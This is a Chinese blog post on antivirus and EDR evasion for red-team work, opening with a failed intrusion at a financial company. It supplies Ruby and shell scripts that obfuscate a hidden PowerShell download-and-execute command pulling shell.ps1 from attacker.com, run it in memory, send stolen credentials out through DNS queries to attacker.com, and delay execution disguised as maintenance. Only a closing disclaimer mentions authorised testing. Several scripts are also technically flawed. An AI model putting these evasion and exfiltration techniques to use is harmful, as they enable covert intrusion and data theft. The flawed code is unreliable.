一、从一次失败的渗透谈起
故事的背景是一次针对某金融公司内网的渗透测试。在这场任务中,我们成功利用一个未修补的 Web 应用漏洞实现了初始访问,并通过横向移动拿到了域控服务器的权限。然而,最终的目标是窃取数据库中的财务数据。当我们尝试上传恶意载荷时,却发现所有的操作都被EDR实时监控拦截。无论是自定义反射型加载器,还是精心混淆的二进制文件,最终都无一例外地被检测到,渗透任务宣告失败。
这场失败让我意识到:免杀技术和检测规避的重要性,已经上升到红队任务中决定成败的关键环节。今天,我将围绕免杀技术进行深度剖析,并通过实战代码演示如何绕过主流EDR的检测,让恶意代码在目标系统上“悄无声息”地运行。
---
二、攻击者的武器库:免杀技术的核心逻辑
究竟什么是免杀?
从攻击者的视角来看,免杀技术的目标是让我们的恶意载荷能够成功运行,同时避免被安全产品(如杀毒软件、EDR、沙盒)检测到。具体来说,免杀的核心包括以下三点:
- 静态免杀:针对文件签名和特征码的检测进行对抗。
- 动态免杀:规避行为分析,绕过沙盒监控。
- 流量规避:隐藏C2通信流量,避免触发流量审计。
只要我们能够从这三方面入手,构造出一个具有隐蔽性的载荷,就能显著提升渗透成功率。
---
三、Payload构造的艺术:静态免杀与动态免杀实战
案例:恶意载荷的静态免杀
以下是一个简单的 Ruby 脚本,它生成了一段反射型加载器的基础代码,并通过混淆技术实现静态免杀:
<pre><code class="language-ruby">require 'base64'
目标恶意代码,用正常代码表示不容易被特征库检测
payload = "powershell -nop -w hidden -encodedcommand #{Base64.encode64('IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/shell.ps1")')}"
简单字符串分割混淆,避免单点签名检测
obfuscated_payload = payload.chars.each_slice(3).map { |slice| slice.join('') + rand(1000..9999).to_s }.join('-')
生成一个恶意载荷文件
File.open("payload.txt", "w") do |file| file.puts obfuscated_payload end
puts "Payload saved as payload.txt!"</code></pre>
关键点解析
- 混淆处理:通过字符串分割和冗余字符插入,避开基于特征匹配的杀软检测。
- Base64编码:将恶意指令进行编码,进一步隐藏真实意图。
- 隐蔽性文件生成:生成恶意文件时避免使用常见字眼,比如“hacker”、“shell”等。
动态免杀:规避行为检测
接下来,我们通过 Shell 脚本演示如何利用内存加载技术绕过动态分析:
<pre><code class="language-shell">#!/bin/bash
将恶意代码加载到内存,而不是写入磁盘
malicious_code=$(cat <<EOF powershell -nop -w hidden -encodedcommand $(echo "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" | base64) EOF )
使用 eval 动态加载到内存
eval "$malicious_code"
提示加载完成
echo "Malicious code executed successfully!"</code></pre>
关键点解析
- 内存动态加载:避免文件落地,减少被杀毒软件实时监控拦截的风险。
- 反射型执行:通过动态调用方法执行恶意代码,规避行为分析引擎。
---
四、流量伪装实战:隐藏C2通信的秘密
流量伪装技术
针对流量审计系统,我们可以通过以下方法进行通信隐藏:
- 协议伪装:利用 HTTPS、DNS 隧道进行 C2 数据传输,伪装为合法流量。
- 流量加密:对通信内容进行二次加密,破坏流量的可读性。
案例:伪装为正常的DNS请求
以下是一个 Ruby 实现,它将恶意数据通过 DNS 隧道发送:
<pre><code class="language-ruby">require 'resolv'
构造恶意数据
malicious_data = "stolen_credentials: username=admin&password=P@ssw0rd"
将数据编码,并分片到DNS查询中
encoded_data = Base64.encode64(malicious_data) encoded_data.scan(/.{1,63}/).each do |chunk| domain = "#{chunk}.attacker.com" begin
通过 DNS 查询发送数据
Resolv::DNS.open do |dns| dns.getaddress(domain) end rescue
忽略任何异常
end end
puts "Data sent via DNS tunnel."</code></pre>
关键点解析
- 分片技术:将恶意数据分成63字节以内的块,避免DNS流量超长。
- 隐蔽性域名:通过伪装域名将恶意数据嵌入到DNS请求中,绕过流量审计。
---
五、如何规避EDR的眼睛:对抗AI驱动的检测
当前许多现代 EDR 都引入了 AI 驱动的行为分析引擎。为了绕过这些检测,我们需要从以下几个方面入手:
- 低噪音执行:减少恶意代码的攻击“特征”。
- 延迟触发:执行时间与恶意代码部署时间分离,降低关联性。
- 正常化行为:模拟合法用户的操作流程,比如伪装为系统管理员活动。
以下是一段 Ruby 代码,它通过延迟触发和用户模拟技术绕过EDR检测:
<pre><code class="language-ruby">require 'time'
延迟触发:伪装为管理员的定时任务
trigger_time = Time.now + 3600 # 一小时后执行 puts "Task scheduled at: #{trigger_time}"
模拟管理员操作
system("cmd.exe /c 'echo Running system maintenance task...'") sleep(3600)
执行恶意代码
puts "Executing malicious operations..." system("powershell -nop -w hidden -encodedcommand #{Base64.encode64('IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/shell.ps1")')}")</code></pre>
---
六、个人经验分享:免杀的艺术不止于代码
免杀是渗透的开端,而不是最终目标。无论是通过静态混淆、动态加载,还是流量伪装,免杀技术的核心始终是“隐蔽性”。以下是我的几点经验:
- 持续更新:EDR和杀毒软件的规则库非常频繁,免杀技术需要紧跟其变化。
- 多重手段结合:单一技术容易被识别,结合静态混淆+动态加载+流量伪装效果最佳。
- 实践出真知:理论研究无法替代实战演练,建议在安全实验室中反复验证免杀效果。
---
声明:本文技术仅供授权渗透测试与安全研究,切勿用于非法用途。